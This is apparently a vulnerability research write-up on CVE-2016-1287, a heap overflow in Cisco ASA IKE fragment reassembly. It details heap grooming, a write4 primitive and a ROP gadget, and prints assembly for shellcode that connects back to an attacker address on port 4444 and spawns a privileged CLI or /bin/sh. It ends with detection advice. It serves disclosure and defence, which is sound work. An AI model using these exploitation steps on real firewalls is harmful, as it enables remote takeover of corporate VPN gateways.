David Barksdale, Jordan Gruskovnjak, and Alex Wheeler
1. Background
Cisco has issued a fix to address CVE-2016-1287. The Cisco ASA Adaptive Security Appliance is an IP router that acts as an application-aware firewall, network antivirus, intrusion prevention system, and virtual private network (VPN) server. It is advertised as “the industry’s most deployed stateful firewall.” When deployed as a VPN, the device is accessible from the Internet and provides access to a company’s internal networks.
2. Summary
The algorithm for re-assembling IKE payloads fragmented with the Cisco fragmentation protocol contains a bounds-checking flaw that allows a heap buffer to be overflowed with attacker-controlled data. A sequence of payloads with carefully chosen parameters causes a buffer of insufficient size to be allocated in the heap, which is then overflowed when fragment payloads are copied into the buffer. Attackers can use this vulnerability to execute arbitrary code on affected devices. This flaw affects IKE versions 1 and 2, but this post will focus on specifics related to version 2.
Background on Cisco’s IKE Fragmentation Implementation
The Cisco IKE fragmentation protocol splits large IKE payloads into fragments, each with the header illustrated in Figure 1.
Figure 1: Cisco IKE fragment header
Each fragment is sent to the recipient as an IKE packet with a payload of type 132. When a payload is fragmented, a fragment ID larger than any previous ID is chosen to identify the fragment’s reassembly queue. Within any reassembly queue all the fragments are the same length, except possibly the last fragment. Each fragment is assigned a sequence number starting with 1. The last fragment is identified by a value of 1 in the last fragment field. The next payload field contains the payload type that was fragmented.
3. Vulnerability
Each fragment triggers processing by two key functions: ikev2_add_rcv_frag() and ikev2_reassemble_pkt(). The first parses the fragment and maintains fragment reassembly queues. The second checks the queues and performs reassembly when all the fragments have arrived. The second function is called after each fragment is received and only acts when the number of fragments in the reassembly queue matches the sequence number of the fragment with the last fragment flag set.
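As a rough model of the two functions described above, the sketch below parses a fragment header and tracks reassembly queues. The field order and widths (next payload, reserved, 16-bit length, 16-bit fragment ID, 8-bit sequence number, 8-bit last fragment flag) are an assumption chosen to match the 8-byte header size mentioned in this post. The names Fragment, parse_fragment and ReassemblyQueues are hypothetical and do not come from lina.

```python
import struct
from dataclasses import dataclass

# Assumed layout of the 8-byte Cisco fragment header (illustrative only):
# next payload (1), reserved (1), length (2), fragment ID (2),
# sequence number (1), last fragment flag (1), all in network byte order.
HEADER = struct.Struct("!BBHHBB")


@dataclass
class Fragment:
    next_payload: int
    length: int      # 16-bit length field exactly as sent on the wire
    frag_id: int
    seq: int
    last: bool
    data: bytes


def parse_fragment(payload: bytes) -> Fragment:
    next_payload, _reserved, length, frag_id, seq, last = HEADER.unpack_from(payload)
    return Fragment(next_payload, length, frag_id, seq, last == 1, payload[HEADER.size:])


class ReassemblyQueues:
    def __init__(self):
        self.queues = {}  # fragment ID -> {sequence number: Fragment}

    def add(self, frag: Fragment):
        """Queue a fragment; return reassembled data once the queue is complete."""
        queue = self.queues.setdefault(frag.frag_id, {})
        queue[frag.seq] = frag
        last_seq = next((f.seq for f in queue.values() if f.last), None)
        # Reassembly only acts when the number of queued fragments equals the
        # sequence number of the fragment carrying the last fragment flag.
        if last_seq is None or len(queue) != last_seq:
            return None
        del self.queues[frag.frag_id]
        parts = []
        seq = 1
        while seq in queue:  # stops at the first missing sequence number
            parts.append(queue[seq].data)
            seq += 1
        return b"".join(parts)
```

Note that this model only counts fragments and never compares the length field against the header size, which is the kind of gap the rest of this section is about.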
Below is a snippet of code from ikev2_add_rcv_frag() showing the length check and the calculation for updating the reassembly queue length.
Figure 2: ikev2_add_rcv_frag() from lina version 9.2.4
While the Cisco fragment length field is 16 bits, Cisco limits queues to half that size. The check in the code above is performed before a fragment is queued. The following are important items to note for this code snippet.
An understanding of the above issues is useful when examining the reassembly for the fragments. The code for reassembly is large, but a relevant snippet from ikev2_reassemble_pkt() is illustrated in Figure 3 for discussion.
Figure 3: ikev2_reassemble_pkt() from lina 9.2.4
The call to my_malloc() is passed the queue length plus a header size. There are several ways to attack this code. The most basic is to create a reassembly queue in which one of the fragments has a length less than the default fragment header size of 8 bytes, which underflows the copy length during reassembly. Such a small value passes the (signed) length check in ikev2_add_rcv_frag(), and the underflowed copy length ends up larger than the buffer allocated in ikev2_reassemble_pkt(), whose size is the reassembly queue length + 8.
4. Exploitation
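Before looking at the exploitation steps, the length arithmetic at the root of the flaw can be sketched in a few lines. This is a simplified model, not the lina code: it assumes the copy length is computed as the fragment length minus the 8-byte header and is then treated as an unsigned 32-bit value by the copy routine. The helper names are hypothetical.

```python
HEADER_SIZE = 8  # default fragment header size stated in this post


def copy_length(frag_length: int) -> int:
    """Bytes copied for one fragment when the header size is subtracted
    without checking that frag_length >= HEADER_SIZE (assumed behaviour)."""
    return (frag_length - HEADER_SIZE) & 0xFFFFFFFF  # unsigned 32-bit view


def alloc_size(frag_lengths) -> int:
    """Buffer size requested for a queue: queue length plus a header size."""
    queue_len = sum(length - HEADER_SIZE for length in frag_lengths)
    return queue_len + HEADER_SIZE


print(hex(copy_length(0x100)))  # well-formed fragment
print(hex(copy_length(1)))      # length < 8 wraps to a huge unsigned value
print(alloc_size([1]))          # while the allocation stays tiny
```

In this model a fragment of length 1 contributes -7 to the queue length, so the allocation shrinks while the per-fragment copy length wraps around.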
Once fragments with a length less than 8 have been crafted, the corruption happens during fragment reassembly. However, the corruption cannot be used as-is for anything beyond a DoS, because the negative copy causes an access violation. The steps needed to turn the vulnerability into remote code execution are discussed below.
Crafting Small Fragments
Crafting small fragments (length < 8) can be accomplished by padding the fragment with valid information past where the fragment should end. For example, even though a fragment of length 1 should not have a size or sequence number, these fields still need valid values. Other fields that are not checked can be padded with random values.
Avoiding the Negative Copy
In order to get remote code execution the negative copy should be avoided. In the interest of brevity we’ll explain the logic and exploitation of it without including the relevant disassembly. Fragments are queued by fragment ID and reassembled using sequence number. All fragments other than the last fragment should have the same size. The following pieces of program logic can be abused to send a sequence of fragments to avoid the negative copy.
Given the above, the following sequence of fragments can be sent to avoid the negative copy.
The above sequence yields a reassembly queue in which the fragments with sequence numbers 0 and 3 are not reassembled, but each results in -7 being added to the reassembly queue length. The fragment with sequence number 1 is the only one that will be reassembled, and N - 8 bytes will be copied from its payload, thus avoiding the negative copy.
Cisco Heap Layout
Some insight into the Cisco heap layout is needed in order to decide what can be achieved with the current memory corruption. The Cisco ASA heap is based on a Doug Lea malloc() implementation. The Cisco heap adds a header and a footer to the classic dlmalloc chunk. The headers and footers carry extra information for memory integrity and debugging/troubleshooting purposes. An allocated chunk layout is described below.
(gdb) x/70wx 0xccedf970 - 0x28
The first 0x28 bytes (in green) are part of the heap header, the 2 last dwords (in blue) belong to the heap footer. The relevant header’s fields from an exploitation perspective are:
A freed chunk layout is as follows:
(gdb) x/70wx 0xccedf970 - 0x28
Similarly, a freed chunk layout is described below.
The vulnerable block of size 0xd3 (the size used for our exploit, which will make sense later in this post) allocated in ikev2_get_assembled_pkt() looks as follows:
(gdb) x/70wx 0xcbf3d1a8 - 0x28
With the Cisco layout in mind, let’s look at what is located behind the vulnerable chunk:
(gdb) x/70wx 0xcbf3d1a8 - 0x28
The first dword of the vulnerable chunk’s data (in red) is reserved for the total size (0xcb) of the fragment data being copied. The last 2 dwords are respectively the header magic and the chunk size of the adjacent 0x30 bytes freed chunk. With a copy of 0xd3 bytes, the fields in red will be corrupted:
(gdb) x/70wx 0xcbf3d1a8 - 0x28
In the end, the magic from the next chunk’s heap header is corrupted, and eventually 1 byte of the next chunk size field can be corrupted. This means that given a correctly crafted heap layout, it is possible to insert a chunk into a freelist reserved for bigger chunks. The attacker can then claim this chunk with another packet and completely corrupt memory overlapped by the fake bigger chunk, as will be explained below.
Crafting the Heap
In order to achieve anything useful, the attacker has to put the heap into a predictable layout. For that, the ikev2_parse_config_payload() function has been used. This function is reached when IKEv2 packets are sent with a Configuration Payload (type 47). The layout of these packets is illustrated in Figure 4.
Figure 4: IKEv2 config payload packet
The IKE v2 Configuration Payload field descriptions are as follows:
The Configuration Attributes field is of variable length and allows specifying multiple attributes. The Configuration Attributes are illustrated in Figure 5.
Figure 5: IKEv2 Configuration Attributes
The IKEv2 Configuration Attributes field descriptions are as follows:
This allows the attacker to allocate chunks of arbitrary size with controlled content, as can be seen from analysing ikev2_parse_config_payload() in Figure 6.
Figure 6: ikev2_parse_config_payload() lina 9.2.4
This controlled allocation allows de-fragmenting the heap and achieving the heap layout below:
A Configuration Attributes List packet is sent to the router in order to de-fragment the heap, and get further allocations to be contiguous to one another. A fragment of size 0x100 bytes is then sent. Each time the IKEv2 daemon receives a packet it will allocate 0x100 bytes to handle the packet data. This means that a 0x100 bytes chunk will be allocated as below:
The fragment of 0x100 bytes will then be allocated next to it:
After the packet is processed, the first 0x100 byte block is freed since it is no longer in use, leaving a hole between the de-fragmented heap and the attacker’s 0x100 bytes fragment:
The last fragment of size -7 (with effective size being 0x108 bytes) triggering the overflow is then sent. A 0x100 bytes chunk is allocated to handle the packet, retrieving the 0x100 bytes chunk that has been previously freed:
Since the actual packet data is bigger than 0x100, a chunk of size 0x300 is allocated in order to contain all the UDP fragment data, and the previously allocated 0x100 bytes chunk ends up being freed. The heap then looks as follows:
A 0x100 bytes hole is then located right before the attacker controlled fragment. ikev2_get_assembled_pkt() will then allocate the vulnerable chunk of size 0xd3. A chunk of size 0xd0 is returned (because some of the footer data is used to hold the extra 3 bytes). Since the heap is de-fragmented, no other free chunk is available to handle the request. The 0x100 bytes free block is then split into two blocks of 0xd0 and 0x30, giving the following heap layout:
The vulnerable my_memcpy() call is then reached and ends up corrupting the “size” field of the adjacent 0x30 bytes free chunk. Arbitrary adjacent chunk “size” field corruption has been achieved.
The corrupted freed 0x30 bytes chunk of the previous sections now looks as follows:
0xcbf3d280: 0xe100d4d0 0x00000061 0xc9109b08 0xc800005c
Note the size field (red) is now 0x61 instead of 0x31. The heap manager will now look for the next chunk, not 0x30 bytes further, but 0x60 bytes (0x61 means 0x60 byte size + previous chunk in use bit set), ending up looking into the attacker’s fragment data. Since the fragment’s data is controlled, a fake heap chunk can be crafted. The 0x60 bytes freed chunk now encompasses a part of the attacker’s fragment chunk’s heap header. The fake heap metadata of the next chunk, just shrinks the size of the fragment to 0x100 bytes to conserve the heap integrity and allow the heap manager to locate the chunk adjacent to the fragment. The heap will then look as follows:
(gdb) x/100wx 0xcbf3d1a8 - 0x28
The copy loop in ikev2_get_assembled_pkt() is exited due to not finding fragment sequence number 2, and the vulnerable 0xd0 sized heap chunk is freed later in the same function. The allocator will look for freed chunks before and after the vulnerable chunk in order to perform forward and backward coalescing. If the “size” field of the 0x30 bytes chunk wasn’t tampered with, the allocator would have backward coalesced the 0xd0 chunk with the 0x30 bytes chunk, leading to the insertion of a 0x100 bytes chunk into the freelist. However, since the “size” field is set to 0x60 bytes, a fake chunk of 0x130 bytes will be inserted into the freelist. The fake 0x130 bytes chunk will encompass the beginning of the adjacent 0x100 bytes block controlled by the attacker.
Getting Control
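The arithmetic behind the fake 0x130 bytes chunk described above can be checked with a short sketch. It assumes the usual dlmalloc convention that the low bits of the size field hold flags (bit 0 being the "previous chunk in use" bit); the Cisco-specific header and footer are not modelled, and the helper names are hypothetical.

```python
PREV_INUSE = 0x1  # low bit of a dlmalloc size field
FLAG_MASK = 0x7   # assumed: low three bits are flags, the rest is the size


def decode_size_field(field: int):
    """Split a size field into (chunk size, previous-chunk-in-use flag)."""
    return field & ~FLAG_MASK, bool(field & PREV_INUSE)


def coalesced_size(freed_size: int, neighbour_size_field: int) -> int:
    """Size of the chunk placed on the freelist after merging with a free neighbour."""
    neighbour_size, _ = decode_size_field(neighbour_size_field)
    return freed_size + neighbour_size


print(decode_size_field(0x31))          # original neighbour: 0x30 bytes
print(decode_size_field(0x61))          # corrupted neighbour: 0x60 bytes
print(hex(coalesced_size(0xD0, 0x31)))  # what the allocator should have built
print(hex(coalesced_size(0xD0, 0x61)))  # the fake, oversized free chunk
```

The extra 0x30 bytes in the second result are exactly the part of the attacker’s fragment chunk that the fake free chunk overlaps.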
The attacker can now reallocate this block by sending a Configuration Attributes List packet containing a number of Configuration Attributes of size 0x130. The 0x130 byte chunk will eventually be retrieved, corrupting the header of the attacker’s 0x100 bytes fragment chunk. As explained in the Cisco Heap Layout section, the heap header contains prev and next pointers to the previous and next free chunks, whose integrity is not enforced because of the lack of safe-unlinking code. This means that an arbitrary write4 primitive can be achieved during the coalescing of the corrupted chunk. The attacker can trigger this write4 primitive at any time by sending a fragment with a different size. When this happens, ikev2_add_rcv_frag() is entered and proceeds to free the fragments in the linked list. The corrupted fragment will eventually be freed, triggering the write4 memory corruption. One prerequisite for the write4 technique is that both the prev and next pointers point to writeable data. This means it is not possible to overwrite a function pointer with an address in a .text section to bootstrap a ROP chain. Fortunately, the whole memory is executable and there is no ASLR.
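The constraint that both pointers must reference writeable memory follows from how an unchecked unlink works: it writes through both of them. The sketch below models this with a sparse memory map. The field offsets (NEXT_OFF, PREV_OFF) and the address ranges are hypothetical placeholders, not the real Cisco header layout.

```python
# Hypothetical offsets of the list pointers inside a chunk header.
NEXT_OFF = 0x8
PREV_OFF = 0xC


class WriteFault(Exception):
    """Raised when the model writes outside writeable memory."""


class Memory:
    """Sparse model of 32-bit memory with a list of writeable ranges."""

    def __init__(self, writeable):
        self.writeable = writeable  # list of (start, end) address ranges
        self.words = {}

    def write32(self, addr: int, value: int) -> None:
        if not any(lo <= addr < hi for lo, hi in self.writeable):
            raise WriteFault(f"write to non-writeable address {addr:#x}")
        self.words[addr] = value & 0xFFFFFFFF


def unsafe_unlink(mem: Memory, nxt: int, prv: int) -> None:
    """Unlink with no integrity check on the two attacker-supplied pointers."""
    mem.write32(nxt + PREV_OFF, prv)  # next->prev = prev
    mem.write32(prv + NEXT_OFF, nxt)  # prev->next = next
```

With one pointer aimed at a read-only region the second write faults in this model, which mirrors why a .text address cannot be used as one of the two values.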
The targeted function pointer is the pointer used to add a fragment to the linked list, which will be called right after the write4 corruption to add the new fragment to the linked list inside ikev2_add_rcv_frag(). The execution flow can then be redirected to an arbitrary writable address in memory. The problem here is that the attacker does not know of any address holding attacker-controlled data. To get around this problem, a 2nd write4 corruption is used when the vulnerable chunk is freed. This is done by targeting other linked list pointers present in the heap header, which are used to keep track of allocated blocks of the same size. The 2nd write4 corruption is used to craft a fake ROP gadget in memory. The following values were chosen as prev and next pointers for the 2nd write4 corruption: 0xc8002000 and 0xc821ff90. This means that during the 2nd write4 corruption the value 0xc821ff90 will be copied to address 0xc8002000. Stored in little-endian order, this value decodes to useful bytecode (nop; jmp dword ptr [ecx]).
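The claim that the pointer value doubles as code can be checked by looking at the bytes a 32-bit little-endian store leaves in memory. The helper names below are hypothetical; the opcode facts used in the comments (0x90 is nop, FF /4 is an indirect near jmp) are standard x86 encodings.

```python
import struct


def dword_as_code(value: int) -> bytes:
    """Bytes left in memory by a 32-bit little-endian store of value."""
    return struct.pack("<I", value)


def split_modrm(byte: int):
    """Split a ModRM byte into its (mod, reg, rm) fields."""
    return byte >> 6, (byte >> 3) & 7, byte & 7


code = dword_as_code(0xC821FF90)
print(code.hex(" "))         # 90 ff 21 c8
# 0x90          -> nop
# 0xff 0x21     -> opcode FF with ModRM 0x21
print(split_modrm(code[2]))  # mod=0, reg=4 (jmp r/m32), rm=1 (ecx) -> jmp dword ptr [ecx]
```

The trailing 0xc8 byte is never reached, since execution leaves through the jmp.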
The attacker now has a gadget at a known location in writeable memory. The pointers used in the 1st write4 corruption are then set so as to overwrite the targeted function pointer with the address 0xc8002000, which contains the ROP gadget. When the control flow is redirected, the program will land at address 0xc8002000 and execute the jmp [ecx] instruction. As can be seen in the code snippet above, the ECX register holds a pointer to the newly allocated fragment containing data controlled by the attacker. Arbitrary code execution has been achieved.
Since the Cisco router reboots if the lina process crashes, the heap has to be fixed in order to be able to get a reverse shell back to the attacker. In order to fix the memory, pointers from the context object located in a local stack variable, pointing to the option list linked list, are followed. By following the next pointer of the linked list and checking some values, it is possible to locate the 0x130 byte chunk used to perform the memory corruption. When it’s located its header is set to 0xd0 and the adjacent 0x60 size field is set back to 0x30 bytes. The following is our process continuation shellcode.
0xccc54fc1: mov DWORD PTR [edx],0x9b96790 ; fix corrupted function pointer
0xccc54fc7: mov eax,DWORD PTR [ebp-0x8] ; retrieve structure in stack
0xccc54fca: mov eax,DWORD PTR [eax+0x5c]
0xccc54fcd: mov eax,DWORD PTR [eax+0x4]
0xccc54fd0: mov eax,DWORD PTR [eax+0x8]
0xccc54fd3: mov eax,DWORD PTR [eax+0x4]
0xccc54fd6: mov eax,DWORD PTR [eax] ; go to the “next” linked list element
0xccc54fd8: test eax,eax
0xccc54fda: je 0xccc55017
0xccc54fdc: push eax
0xccc54fdd: mov eax,DWORD PTR [eax+0x8] ; follow some more pointers
0xccc54fe0: mov eax,DWORD PTR [eax+0x4]
0xccc54fe3: lea ebx,[eax+0xd8] ; set ebx to the beginning of the corrupted chunk
0xccc54fe9: pop eax
0xccc54fea: cmp DWORD PTR [ebx],0xe100d4d0 ; ensure we have the right chunk
0xccc54ff0: jne 0xccc54fd6
0xccc54ff2: cmp DWORD PTR [ebx+0x4],0x31 ; Another check
0xccc54ff6: je 0xccc54fd6
0xccc54ff8: mov eax,ebx
0xccc54ffa: sub eax,0x100 ; Point eax to the beginning of the vulnerable chunk
0xccc54fff: mov DWORD PTR [eax+0x4],0x103 ; Fix heap metadata
0xccc55006: mov DWORD PTR [eax+0xc],0xd0
0xccc5500d: mov DWORD PTR [eax+0xf8],0xa11ccdef
The shellcode fixes the corrupted pointer used to take control of the execution flow. Then it retrieves a local variable which holds pointers to the linked list of Configuration Attributes. By following the linked list and enforcing specific values, the shellcode is able to locate the corrupted chunk in memory, and fix its heap metadata to prevent the process from crashing when the chunk is later freed. Then the real payload is executed which will be addressed in the next section.
Cisco ASA Shellcode
It’s necessary to use several functions of the lina binary to get a reverse shell or the Cisco CLI. It is not possible to use a classic connect-back shellcode because the only network device available is the tap device. The lina binary is responsible for handling network connections (e.g. TCP and UDP), acting as a kind of user-land network driver. Cisco uses the “channel” terminology for network connections. Since the shellcodes are too big for this post, only their general behaviour will be explained here.
Since the IKEv2 Daemon is actually a thread of the lina process, the shellcode starts by spawning a new thread for the Cisco CLI by calling process_create() and allows the IKEv2 daemon to continue to do its job. Then the daemon allocates a TCP channel connecting back to the attacker’s IP address/port by calling alloc_ch():
push eax ; Points to string “tcp/CONNECT/3/126.96.36.199/4444”
mov eax, 0x80707f0 ; call alloc_ch()
The shellcode then sets the channel as responsible for the I/O on stdin/stdout/stderr:
; Set channel as in/out channel for ci/console
mov esi, 0xffffefc8
mov eax, dword ptr gs:[esi]
mov dword ptr [eax + 0x98], ebx ; Points to allocated channel
Then, a structure responsible for the user privileges is allocated, and its privileges are set to 15 (maximum cisco privileges):
mov eax, 0x080F0A80 ; Initialize privileges structure given as parameter
; Retrieve struct
; Give me full privileges and a cool ‘#’ prompt
mov dword ptr [ebx + 0xc], 0x17ffffff ; Give full privileges
add ebx, 0x14
; Set “enable_15” username
mov dword ptr [ebx], 0x62616e65
mov dword ptr [ebx + 4], 0x315f656c
mov dword ptr [ebx + 0x8], 0x00000035
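The three immediates written above can be decoded to confirm that they spell the username mentioned in the comment. This is only a check of the byte order, assuming the little-endian dword stores of 32-bit x86; the variable names are illustrative.

```python
import struct

# Immediates stored at [ebx], [ebx + 4] and [ebx + 0x8] in the listing above.
dwords = [0x62616E65, 0x315F656C, 0x00000035]

# x86 stores each dword least-significant byte first.
raw = b"".join(struct.pack("<I", d) for d in dwords)

# The string ends at the first NUL byte.
username = raw.split(b"\x00", 1)[0].decode("ascii")
print(username)  # enable_15
```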
Finally the shellcode proceeds to call the ci_cons_shell() in order to spawn the Cisco CLI back to the attacker’s computer:
push 0x0a52c160 ; some function
mov eax, 0x080F6820 ; ci_cons_shell
Which gives the following result:
Type help or ‘?’ for a list of available commands.
ciscoasa# show running-config enable
show running-config enable
enable password 8Ry2YjIyt7RRXU24 encrypted
The reverse shell is trickier to get and, ironically, probably not as useful as the Cisco CLI. The shellcode enables a hidden SOCKSv5 proxy in the lina process by calling a function which has been dubbed start_loopback_proxy(). It is then possible to use classic sockets by connecting to the local SOCKSv5 proxy and telling it to connect back to the attacker’s computer. Since the SOCKSv5 protocol is simple, this is easily done in assembly. The shellcode then proceeds as a classic connect-back shellcode, dup2()ing the socket onto stdin/stdout/stderr and execve()ing “/bin/sh”:
/bin/sh: can’t access tty; job control turned off
Checking the value of the length field of a Fragment Payload (type 132) in an IKEv2 or IKEv1 packet allows detecting an exploitation attempt. Any length field with a value < 8 must be considered an attempt to exploit the vulnerability. The detection also has to deal with the fact that multiple payloads can be chained inside an IKEv2 packet, and that the Fragment Payload may not be the only or the first payload of the packet.
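A minimal sketch of such a check is shown below. It assumes the standard 28-byte IKE header and 4-byte generic payload header, walks the payload chain, and flags any type 132 payload whose length field is below 8. The function name is hypothetical, and the sketch does not handle the 4-byte non-ESP marker used on UDP port 4500 or payloads hidden inside an encrypted payload.

```python
import struct

IKE_HEADER = struct.Struct("!8s8sBBBBII")  # SPIs, next payload, version, exchange, flags, msg ID, length
GENERIC_PAYLOAD = struct.Struct("!BBH")    # next payload, critical/reserved, payload length
FRAGMENT_PAYLOAD = 132                     # Cisco fragment payload type
ENCRYPTED_PAYLOAD = 46                     # IKEv2 encrypted payload; its contents cannot be walked
MIN_FRAGMENT_LENGTH = 8


def has_short_fragment(packet: bytes) -> bool:
    """Return True if any Fragment Payload in the chain has a length field < 8."""
    if len(packet) < IKE_HEADER.size:
        return False
    current = IKE_HEADER.unpack_from(packet)[2]  # type of the first payload
    offset = IKE_HEADER.size
    while current != 0 and offset + GENERIC_PAYLOAD.size <= len(packet):
        nxt, _flags, length = GENERIC_PAYLOAD.unpack_from(packet, offset)
        if current == FRAGMENT_PAYLOAD and length < MIN_FRAGMENT_LENGTH:
            return True
        # Stop on a length that cannot advance the walk, or on encrypted data.
        if length < GENERIC_PAYLOAD.size or current == ENCRYPTED_PAYLOAD:
            break
        offset += length
        current = nxt
    return False
```

A production signature would also need to bound the walk by the length declared in the IKE header and decide how to treat truncated packets; those choices are left out here.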